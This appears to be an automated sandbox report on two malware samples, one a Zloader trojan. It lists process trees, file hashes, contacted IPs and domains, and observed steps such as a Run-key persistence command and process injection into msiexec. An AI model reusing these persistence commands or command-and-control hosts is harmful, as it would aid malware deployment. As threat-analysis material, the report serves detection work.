C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED0B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9B6625449315408391E32C6D6AA0F6AC.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tv8d9fii.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDB6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4CD017347A264B2EB9575A79CB9266E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ks3aeal5.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEDF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF966AE98B94E434786A19EC5901CFA.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wxln2hv-.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFAA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5CF41B3890034FC0B55240DAF1F7DD2E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\b6wa28ex.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF066.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2537EA5827D14851B87853BF2F353397.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\8jiuu6qn.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0E3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD737156C5AA547DFB570F4FB91D95D7E.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sinlewel.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF160.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6E7B9E0031A544C2A310247F9774396C.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6xcpfogb.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF1DD.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6B867A7274FE44FBAE31E7C8AC6444BF.TMP"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j5hwri9v.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF23B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF7D944F392DA4528861D5A75E84BF070.TMP"

C:\Users\Admin\Documents\foldani.exe

"C:\Users\Admin\Documents\foldani.exe"

Network

Country Destination Domain Proto
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp
FR 94.23.220.50:559 tcp

Files

C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe

MD5 3d3e7a0dc5fd643ca49e89c1a0c3bc4f
SHA1 30281283f34f39b9c4fc4c84712255ad0240e969
SHA256 32d49dc703d8c827ca9ff7d5389debf7314b062a989db36d1360aae21a77db0e
SHA512 93ae1ac6739d91488b88f487a252a411d85dc52a409489a61315235e4a3ec6a178cceac207426b779a1494ab792422263652f1ad310b8bab7ad296d2e7222e68

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\tacbvfff.exe.log

MD5 cb76b18ebed3a9f05a14aed43d35fba6
SHA1 836a4b4e351846fca08b84149cb734cb59b8c0d6
SHA256 8d0edecf54cbbdf7981c8e41a3ed8621503188a87415f9af0fb8d890b138c349
SHA512 7631141e4a6dda29452ada666326837372cd3d045f773006f63d9eff15d9432ed00029d9108a72c1a3b858377600a2aab2c9ec03764285c8801b6019babcf21c

C:\Users\Admin\AppData\Local\Temp\ketljfyr.cmdline

MD5 31a85935486e4a5cdbdff366163286b0
SHA1 cc8581f80ba150558274b0cfe48e1f66d39d8d79
SHA256 2e7c3a1abacc8b5272e9389b67208a86f63eb43bf2d44eb25b028474c1cda917
SHA512 d02a41b8fe55ed2183b305003b0ff07e12ef1fc21aca30e1c2b9f45b2ac6c9f31c8c1b0df3c06cbc90c65d53462f7c72d9990870c771dda616606b1b618f2f21

C:\Users\Admin\AppData\Local\Temp\ketljfyr.0.vb

MD5 61413d4417a1d9d90bb2796d38b37e96
SHA1 719fcd1e9c0c30c9c940b38890805d7a89fd0fe5
SHA256 24c081f2f8589c160e6c556507f9a9590983445b933ce6a73f889b5096c211d7
SHA512 9d8ef98bcae56a7abe678f08ba4ef76a135a14f6ca63c02a6e1ea2ddda233802e2aad6c4fc309026e16cd3a8e87a04fe6d4a0acfb9736cca6d670926c83d6cd4

C:\Users\Admin\AppData\Local\Temp\vbc1592735C24D046A485936B9EBA6C6822.TMP

MD5 55335ad1de079999f8d39f6c22fa06b6
SHA1 f54e032ad3e7be3cc25cd59db11070d303c2d46d
SHA256 e05c551536a5ee7a7c82b70d01f0b893db89b3dab1cd4c56ea9580e3901071ac
SHA512 ca8c2f680c3d6a61c8ad18b899f7d731f610dc043729a775fd6eade6e11332c1f32c7cf60464b6b3fd41aead9b0c65bc13934574740179931d931516c13027ca

C:\Users\Admin\AppData\Local\Temp\RESEC3F.tmp

MD5 8205ed20f0ca1bc2440f35b24eff373a
SHA1 36b7f1629ef0b6ce4a180622cb459f848f1531c9
SHA256 b0a4b8658564d1b8fd3ad135d29f7ba14e9e4755f2c068e57f026a7a2a712ece
SHA512 b31f41890d25b2c50f3d8b13823c84e4d9fd4848d81780133bd0ec811fff81754bad8ee0ded9531cf1d20bea72fffe24fe3fdd685b5918d3bad7a7ebcede707c

C:\Users\Admin\AppData\Local\Temp\pjxkzgrh.0.vb

MD5 fe8760874e21534538e34dc52009e8b0
SHA1 26a9ac419f9530d6045b691f3b0ecfed323be002
SHA256 1be68e1d0beb3861fd8a519cc4c4d0b4122cbea7109bcf3e08f294705579d439
SHA512 24c249972146048e134b86e909d51d04d3b821605cb08383921e80f6c3595dc65f9315abbd53704387bdda5c2691b5218658823f1de80e39d25152c9d367c6ed

C:\Users\Admin\AppData\Local\Temp\pjxkzgrh.cmdline

MD5 240f5425f710779e0b75d85b162835dc
SHA1 708548b6e2fb3d2f7da3e1016c085b230b2d122c
SHA256 a679f601370dd871f4c109fa5df01e2998ae109427d4ae9cdb966982c52af517
SHA512 bf6ad3456378906d68e5aeb50454bd083eb31fa3edc3d050c6a2ec66c8346cc69f89161bc5f862753eeb03648ea8f00b8bdaf087e724884ca6177e63f44d2c79

C:\Users\Admin\AppData\Local\Temp\vbc9B6625449315408391E32C6D6AA0F6AC.TMP

MD5 dac60af34e6b37e2ce48ac2551aee4e7
SHA1 968c21d77c1f80b3e962d928c35893dbc8f12c09
SHA256 2edc4ef99552bd0fbc52d0792de6aaa85527621f5c56d0340d9a2963cbc9eed6
SHA512 1f1badd87be7c366221eaa184ae9b9ae0593a793f37e3c1ce2d4669c83f06de470053550890ad6781b323b201a8b9d45a5e2df5b88e01c460df45278e1228084

C:\Users\Admin\AppData\Local\Temp\RESED0B.tmp

MD5 bc16ef00842fa7722b0006a27393d75f
SHA1 63bf6fdfddba852e7764e57bcc62a818eb38f0d4
SHA256 40c5fbc69bd4c9e3918085bbb8e9635048fb454574e7312d50568d6f456c0979
SHA512 48f7ca550086b3c3f2e0f69543d56f7bb8a3841da47fd7b2475b5234953d3c56ac834c0747bd30af3c76fe8e871a1d3d0284929657df8af447c40d95365742ec

C:\Users\Admin\AppData\Local\Temp\tv8d9fii.cmdline

MD5 923b1dc02a5020bf43f532c7b1e66989
SHA1 0ab6fec489c98ad4f54398ee2aae8d70aedaa4ab
SHA256 576fa4c89c4cda0324e7117ec2cf62876bcf54d885827fdae8890b43779e6728
SHA512 2d77fd2fc66b16081ee0de67575daea345e5d44ff05bc436188d5f4f74ca2616c32e3adcbdf44579b4de02e27c16cd3acdd49abfe520cce36fbc1671adf6d458

C:\Users\Admin\AppData\Local\Temp\tv8d9fii.0.vb

MD5 05ab526df31c8742574a1c0aab404c5d
SHA1 5e9b4cabec3982be6a837defea27dd087a50b193
SHA256 0453a179e3926d451c45952c7704686fbe7f35ec91d2b3b4d9dc909f6b7a8430
SHA512 1575da9de9cc37d3fb9fdc2a14aeb56d1debfd09534f231a0eddec35cb20ed25032eb709cb907d5d504a450278fe810d6f297939f11b63935518a4bfeb1b4c40

C:\Users\Admin\AppData\Local\Temp\vbc4CD017347A264B2EB9575A79CB9266E.TMP

MD5 3906bddee0286f09007add3cffcaa5d5
SHA1 0e7ec4da19db060ab3c90b19070d39699561aae2
SHA256 0deb26dcfb2f74e666344c39bd16544fcaae1a950be704b1fd4e146e77b12c00
SHA512 0a73de0e70211323d9a8469ec60042a6892426e30ad798a39864ba123c1905d6e22cb8458a446e2f45ec19cf0233fa18d90e5f87ec987b657a35e35a49fea3b0

C:\Users\Admin\AppData\Local\Temp\RESEDB6.tmp

MD5 36bac4922a56df7f569061899260abca
SHA1 2fb07fca9dda3a4a62ca198617a3d874ecc6403c
SHA256 e7845f1a218390bf78e3aa0f292899121b7c1c3656bfb41957938efb59c67656
SHA512 ba6c61e00def241ee5e4f548fa429456361bc682d470684f9355bdc60ef13693c8670b5c960786e03a2c78f1769720f5dafc4d597bb48bbf2b291b4db2669c1a

C:\Users\Admin\AppData\Local\Temp\ks3aeal5.cmdline

MD5 6d5b0b862bf5d418262e84b546a30bd3
SHA1 c8b3948329ab1d3e83c1920ec4e7d825365ae57d
SHA256 43bf164721a000f01ee9339b748b7625d7a8f96616de90ac3203c0ab236c2a92
SHA512 5eb912c4a0a83d86a1b7bc381a9928712de89d05b6f567fd556a9ba5e84ad16eb2f4d880132423686f4359d025c1ff872a5aad52a5826877146b4accfcb50189

C:\Users\Admin\AppData\Local\Temp\ks3aeal5.0.vb

MD5 6989ad9512c924a0d9771ce7e3360199
SHA1 1bcc5312adf332719db83156f493ad365f5bdec6
SHA256 f80c2d143ea239ba9c96fda416193860cd3d3216e264b856466375bb14618168
SHA512 13a0b21b94c5865ec82e4d3d4fca50f2a1948428acc696601ced1f1bf1044338eb5aeee504ca645bd0f6e6c20b2869b832a7fb693618baea756e740af86d5536

C:\Users\Admin\AppData\Local\Temp\RESEEDF.tmp

MD5 7eba78af372e297cff2f7e2ca70683df
SHA1 2fdecd059601e3de662272f71e51f3b9929893e7
SHA256 71805628a8fdd77c4619424147f59a8be167069fbd9982ac9e208c3b9ad9bfc6
SHA512 2ca82f74e8a880614ce50f6967f7bfeea91edd5cb7b81755f7d545b6b2d3f1083a814c2e2a51f11c969e47da940d9f60e2697d4f8d349e64f8f8585da9c8f1db

C:\Users\Admin\AppData\Local\Temp\wxln2hv-.cmdline

MD5 4adb3caef1c912a2e1856a2aab48fb78
SHA1 c060cc3412401aa30d28abd036693fd67eae865a
SHA256 dcb1d8c4f6b98a7a1a4b30795c9943780dc62217a918eb7313b455510f06ee1f
SHA512 a229df745172ad42d77ca21cd16695cfa6807ad6b665d821a0504b56f3f3f995ddadccabc067df3ff1ca734815ede1976c1e2fded1bb06aef3136f2d992c2108

C:\Users\Admin\AppData\Local\Temp\wxln2hv-.0.vb

MD5 9a478476d20a01771bcc5a342accfb4e
SHA1 314cd193e7dae0d95483be2eae5402ce5d215daa
SHA256 e08019db10e6857bff648942f49ae96e3b9159b75e8e62643a8da0ff5b0f3a40
SHA512 56903e24de594dd009ee292ab91ba9333db2426c3da63ceba3242439a1fa5981f390f6185250cb53739e9cfd37dcec6e85bed5641d04f017e29016985cdd3f29

C:\Users\Admin\AppData\Local\Temp\vbc5CF41B3890034FC0B55240DAF1F7DD2E.TMP

MD5 85c61c03055878407f9433e0cc278eb7
SHA1 15a60f1519aefb81cb63c5993400dd7d31b1202f
SHA256 f0c9936a6fa84969548f9ffb4185b7380ceef7e8b17a3e7520e4acd1e369234b
SHA512 7099b06ac453208b8d7692882a76baceec3749d5e19abc1287783691a10c739210f6bdc3ee60592de8402ca0b9a864eb6613f77914b76aec1fc35157d0741756

C:\Users\Admin\AppData\Local\Temp\RESEFAA.tmp

MD5 b3b6acce38cb02596c1b9b4bc046e76e
SHA1 a95b23661e0bbd97ee0abc3a957e12d2b7ca3bca
SHA256 9dc7d42f7cab415b2cea3614699d693eef11b5c89f5acd6db5f5e3d8006a01e4
SHA512 317497844720d95e9a2b49e57e9d5475bb756ce7f3815cfd95b3c4035b18fe2bc13d043feee46b35e547a864662a1c5a4556ca81450b977426a0b0b0f10aba14

C:\Users\Admin\AppData\Local\Temp\b6wa28ex.cmdline

MD5 5987a2bb89c64602bd77a8b3b86aa6e6
SHA1 df957f9d94e62760d646d4d4b3b469cd6960744a
SHA256 6d46e6625a4ac608a391621548bfcb9065b43a0fa8e170f8e0a2e0f2600b2bd2
SHA512 b5076158e72ef831900f6d30b8ac1c9f79cbc409462634f8e2af93bd6ea7fc5ea98e73f8efd327d7076dbc75b8362ba76898c5d25eb0c9b123e1f8a803c107f7

C:\Users\Admin\AppData\Local\Temp\b6wa28ex.0.vb

MD5 b34b98a6937711fa5ca663f0de61d5bb
SHA1 c371025912ab08ae52ff537aaa9cd924dbce6dcc
SHA256 f1dbc184336bf86e88e1cbc422009ff85febd6bc887ae483bc10109f30ebf69a
SHA512 2c27a72d8a2d120a222add219a0e4f11af38421433210ced930c37ccb9a0cc419fe01e45c874aee2c99613785fa4d44a66fa73c41e4dce9810d4deb24476b98f

C:\Users\Admin\AppData\Local\Temp\RESF066.tmp

MD5 148478b4c2b371e0e629fca5acb6b61c
SHA1 18129ea8dadc8cb356ec8a52a1fde5695c48b536
SHA256 c54dc9addf7dc1b54991f782d055b202f93748e34b6df6a3f3ed12e1fe7e9b6b
SHA512 0589c03a66620a762dcf5c16cf337b9a97507735981c32eaff900a25bdfedff4778cf686df882711bd9f3473d65450af3c6993c10fa31242a10c1244e2469f2c

C:\Users\Admin\AppData\Local\Temp\8jiuu6qn.0.vb

MD5 af52f4c74c8b6e9be1a6ccd73d633366
SHA1 186f43720a10ffd61e5f174399fb604813cfc0a1
SHA256 2d85e489480ba62f161d16a8f46fb85083ab53f2d9efe702ce2e49e0d68eca07
SHA512 c521dacb09ddfe56e326cf75f9f40adc269a9b48ea3217e55c6381e836d226066ecf9721650ce74aebb763cd1d22f3d1f06b4567ee7683ba83f5f00ef41ae99e

C:\Users\Admin\AppData\Local\Temp\8jiuu6qn.cmdline

MD5 62b713417070f91f5b1af3ad022d7b39
SHA1 acd4d4a16b1fa495103872a99782950b46d5f8b7
SHA256 1c9ffaec8a95793e353a6d7deab8c6d3048c365b40fd1fc5ce9a0b890776063b
SHA512 69181ce1d49abb9c2e0ea8c2973aada49934b9501229827df03a3e0332b5922cfa83d57e7d882cb333a18b7ab19f0a2e31526149dba90770ec564044fbc0a3bf

C:\Users\Admin\AppData\Local\Temp\vbcD737156C5AA547DFB570F4FB91D95D7E.TMP

MD5 8135713eeb0cf1521c80ad8f3e7aad22
SHA1 1628969dc6256816b2ab9b1c0163fcff0971c154
SHA256 e14dd88df69dc98be5bedcbc8c43d1e7260b4492899fec24d964000a3b096c7a
SHA512 a0b7210095767b437a668a6b0bcedf42268e80b9184b9910ed67d665fba9f714d06c06bff7b3da63846791d606807d13311946505776a1b891b39058cfb41bd4

C:\Users\Admin\AppData\Local\Temp\RESF0E3.tmp

MD5 522f9d1e07a2a1e6767276dbcbe5ec8c
SHA1 a2c36f6089dc7a4d9ad490543063471e5d274d16
SHA256 ed61f843745dad50a2b8706a92bd3409ec576596736bda8d66f18863fafe9bbf
SHA512 882659b5c1c1865b37cfa38305dba0fbb93411378fc7e2e8a58897f966d6b80885152fb6a3d0e196f54c8c2c70f23884992c99b2612cf03eb1981fdcfbe83d63

C:\Users\Admin\AppData\Local\Temp\sinlewel.cmdline

MD5 1f448be937f583be715a6c47e969382f
SHA1 5a2638c8087f59c0dedf5628857b72fc6cb7a344
SHA256 a90be90da16d610a09a294b709e52e29b5d50b71e67b5f7f68fdd23556388bec
SHA512 c991fc1cbbe10d226ac2940e02905e9aae49480bfb2c8922d180c7bc3d6c432ad7935eb4a43dc1f2d4c4387007f5f37c377ef517fc9f9a242df11cb84b615a48

C:\Users\Admin\AppData\Local\Temp\sinlewel.0.vb

MD5 6d569859e5e2c6ed7c5f91d34ab9f56d
SHA1 7bcd42359b8049010a28b6441d585c955b238910
SHA256 3352cf84b9c7b33c2dd6e2194ff24e6a5bd0da7bb829c6cadcf9b33c65f21e78
SHA512 accd61c856a1f862699566e9f0cea6a30ab0261fa5fd048a00a5a98bf827184ebfdf1c3c879987bb2210626e71c390f2f366bea02f9ec3219cce4c15ef7ea0d7

C:\Users\Admin\AppData\Local\Temp\RESF160.tmp

MD5 dc222ae00c9605cf8e2f6ec9dccd7a90
SHA1 ea9bde7e068023ac7496f8701792ef1df9376925
SHA256 bf06ff4f55c2f24a1dd45dbe02f18e6f8431f0cb0164976d954d94e559ac7d54
SHA512 d9aee9c7c4813c9a4636dd15ccbc88a8fa33d86ebb92acd0946ddc711522f9f47bff3ad92a8c85d53a64cf7b9bf58f2df5f02aebcd1fa6459af66c3259571b45

C:\Users\Admin\AppData\Local\Temp\6xcpfogb.cmdline

MD5 bed06ac4148f4ae5d4a30918363d9b47
SHA1 5c5111d6279af87ca5c4daa648a5b7040b25c5dc
SHA256 43a50fc4d4133b3e1b960d686ce312ac2a08a23ff4569fd101f00e100aeffba1
SHA512 062354a787351989c47cc8818fce7f3a5922920a84b9e3a0bbc91464f599e33292640a97c7bb100dd423a3dcaef86c4d5ce172c7f9638ffde8ddc58d6f85b239

C:\Users\Admin\AppData\Local\Temp\6xcpfogb.0.vb

MD5 62caeb4021ea9d333101382b04d7ac1c
SHA1 ebe2bb042b8a9c6771161156d1abdce9d8d43367
SHA256 e466fcc723dfa8d713c6e7c2208581f1c94ecf06a5dd2e3b83d3a93636badbd7
SHA512 e283647c6e24d912833229ce80055d103359ace1e83c051227d40a672691491ef612ea639ebc896d01ff132c5f101132b5397e5c59a8ddbf11e58fdd2052247c

C:\Users\Admin\AppData\Local\Temp\RESF1DD.tmp

MD5 4d6f633d78a3da13f0113e485227e978
SHA1 9b0f0bd23f4d66f3566a7b6318ff9de682004d4d
SHA256 866cea41a55241d1397ea6bc51a0809ff6d2831cff1570654d3f03d5437defa9
SHA512 7b83164d34df6cef457c8a59f51738f5aaaf676701237dda8beb8696dfb7cc2630b2f0abbe50a57fe2fb96934b959181e82f38ad30b12e5c41ad76c1cddd2973

C:\Users\Admin\AppData\Local\Temp\j5hwri9v.cmdline

MD5 01f98e049edd39792f8d6e76f729f837
SHA1 c0ed1af5bc696c4cf63ecf6ad624f1605198ce0e
SHA256 cd93930bc39664b0e6cd84ad889b4c5db05d9b1be6d39bf0a228f9aa3a7ca9fb
SHA512 4ac11c15071c6674feeb5b07d881056ad4c530ef1286ecf72e12d5cdfdfd154490be2da7890c724a2af5f863d700a4ac381dfaef92ddbfa95a4501e8f079b081

C:\Users\Admin\AppData\Local\Temp\j5hwri9v.0.vb

MD5 9cc0fccb33a41b06335022ada540e8f9
SHA1 e3f1239c08f98d8fbf66237f34b54854ea7b799a
SHA256 b3007d9bef050c2dd5b7c6376ccfc00929cd51f23fcd6cbc254b139ddaf81a49
SHA512 9558ae7a93851c901293c8971d141915ed99bbe98c23855e8d4584936bf3b793904ff452d61e620614cd90c7dc2f385f86fee73cfbe4e6ddf6ee9f71b8e2f6eb

C:\Users\Admin\AppData\Local\Temp\vbcF7D944F392DA4528861D5A75E84BF070.TMP

MD5 7a707b422baa7ca0bc8883cbe68961e7
SHA1 addf3158670a318c3e8e6fdd6d560244b9e8860e
SHA256 453ad1da51152e3512760bbd206304bf48f9c880f63b6a0726009e2d1371c71c
SHA512 81147c1c4c5859249f4e25d754103f3843416e3d0610ac81ee2ef5e5f50622ea37f0c68eeb7fa404f8a1779dc52af02d2142874e39c212c66fa458e0d62926a9

C:\Users\Admin\AppData\Local\Temp\RESF23B.tmp

MD5 cbfdc694961ec4231f2802b8900a2c41
SHA1 35a2d4109ecc605089515c9bfd58fb66df6bbc7b
SHA256 3d855bd084368e88b68d32614641f09b9bc5c6784e25750800f43ed838f457b2
SHA512 ced0c1ec275f364acf5a70abfe431a2c87b83c75347dd86f4edf70e96e2a4bb5f903bcb4320259c33a1d6e6eb164cc040cc8c4da229c62afb05ff983a6a247ee

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

97s

Max time network

116s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3690492401-2005096563-3427069815-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ahydgaa = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\Agbibo\\fyofbabu.dll,DllRegisterServer" C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4876 set thread context of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 set thread context of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2748 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2748 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2748 wrote to memory of 4876 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 4876 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe
PID 2432 wrote to memory of 3584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2432 wrote to memory of 3584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3584 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3584 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3584 wrote to memory of 1444 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe
PID 1444 wrote to memory of 4564 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.dll

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c rundll32.exe C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll,DllRegisterServer

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll,DllRegisterServer

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll,DllRegisterServer

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 airnaa.org udp
US 8.8.8.8:53 airnaa.org udp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 airnaa.org udp
US 8.8.8.8:53 banog.org udp
US 8.8.8.8:53 banog.org udp
US 8.8.8.8:53 banog.org udp
US 8.8.8.8:53 rayonch.org udp
US 8.8.8.8:53 rayonch.org udp

Files

C:\Users\Admin\AppData\Roaming\Agbibo\fyofbabu.dll

MD5 9e9bb42a965b89a9dce86c8b36b24799
SHA1 e2d1161ac7fa3420648ba59f7a5315ed0acb04c2
SHA256 08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d
SHA512 e5ba20e364c96260c821bc61eab51906e2075aa0d3755ef25aabfc8f6f9545452930be42d978d96e3a68e2b92120df4940b276c9872ebf36fa50913523c51ce8
